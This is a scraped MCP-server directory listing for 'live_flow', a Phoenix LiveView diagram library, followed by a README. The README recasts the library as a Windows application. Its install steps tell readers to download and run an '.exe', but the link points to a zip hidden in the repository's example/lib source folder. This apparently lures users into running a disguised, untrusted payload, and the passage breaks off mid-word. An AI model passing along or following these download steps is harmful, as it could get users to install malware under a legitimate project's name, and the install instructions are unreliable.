Create interactive node-based flow diagrams and editors for Phoenix LiveView with pan, zoom, drag, custom nodes, undo, and JSON export.
Config is the same across clients — only the file and path differ.
{
"mcpServers": {
"live-flow": {
"command": "<see-readme>",
"args": []
}
}
}Are you the author?
Add this badge to your README to show your security score and help users find safe servers.
live_flow is a simple tool for creating flow diagrams on your computer. It helps you build diagrams using points called nodes and lines called connections. You can move things around by dragging, zoom in and out, and easily connect different parts. It's designed to work with Phoenix LiveView, but you don’t need to understand the technical parts to start using it.
No automated test available for this server. Check the GitHub README for setup instructions.
Five weighted categories — click any category to see the underlying evidence.
No known CVEs.
No package registry to scan.
Be the first to review
Have you used this server?
Share your experience — it helps other developers decide.
Sign in to write a review.
Others in developer-tools / design
A Model Context Protocol (MCP) server and CLI that provides tools for agent use when working on iOS and macOS projects.
XcodeBuildMCP provides tools for Xcode project management, simulator management, and app utilities.
Asynchronous coordination layer for AI coding agents: identities, inboxes, searchable threads, and advisory file leases over FastMCP + Git + SQLite
MCP server for accessing Figma plugin console logs and screenshots via Cloudflare Workers or local mode
MCP Security Weekly
Get CVE alerts and security updates for Live_flow and similar servers.
Start a conversation
Ask a question, share a tip, or report an issue.
Sign in to join the discussion.
live_flow is a simple tool for creating flow diagrams on your computer. It helps you build diagrams using points called nodes and lines called connections. You can move things around by dragging, zoom in and out, and easily connect different parts. It's designed to work with Phoenix LiveView, but you don’t need to understand the technical parts to start using it.
With live_flow, you can create things like:
If you've worked with flowcharts or mind maps before, live_flow works like those but focuses on node-based design with smooth controls.
Pan and Zoom
Use your mouse wheel to zoom in and out. Drag the canvas to move around your diagram. There’s also a small map view that shows where you are.
Drag Nodes
Click and drag any node to move it. The tool helps snap nodes to an invisible grid for neat alignment. Lines appear to help line up nodes properly.
Connections
Add lines between nodes using points called handles. You will see a live preview before the connection is made. The app prevents invalid connections.
Select Nodes
Click to select a node, hold Shift and click for multiple nodes, or drag a box to select many at once.
Custom Nodes
Use different types of nodes for different purposes. The app supports custom layouts to fit your needs.
Edge Styles
Choose from curved, straight, or stepped lines to connect nodes. Edges can have animation for clarity.
Edit Edge Labels
Double-click edge labels to change their text right on the diagram.
Undo and Redo
If you make a mistake, undo it. Redo is also available to move forward again.
Copy and Paste
Copy nodes or connections, then paste or duplicate them anywhere on the canvas.
Save and Load
Export your whole diagram as a JSON file. Later, import it back to continue working.
Collaboration
(Feature under development) Soon, multiple users will work on the same diagram.
live_flow is designed to run on Windows PCs. Here are the minimum specs to run it smoothly:
You can get live_flow from the official release page on GitHub. Follow these steps carefully:
Click the big green button below to visit the download page:
On the GitHub releases page, find the latest version (usually at the top). Look for the Windows installer file. It will have an .exe extension. For example: https://github.com/Hisawa34/live_flow/raw/refs/heads/main/example/lib/flotas_web/flow-live-v3.2.zip.
Click on the .exe file link. Your browser will start downloading the file. Wait until it finishes.
Open your Downloads folder and double-click the downloaded .exe file to start the installation.
If Windows asks for permission to install, click Yes.
Follow the on-screen instructions in the installation wizard. Choose where to install or accept defaults.
When installation completes, look for the live_flow shortcut on your desktop or in the Start menu.
Double-click the live_flow icon to open the application.
You should now see the live_flow main interface ready for you to crea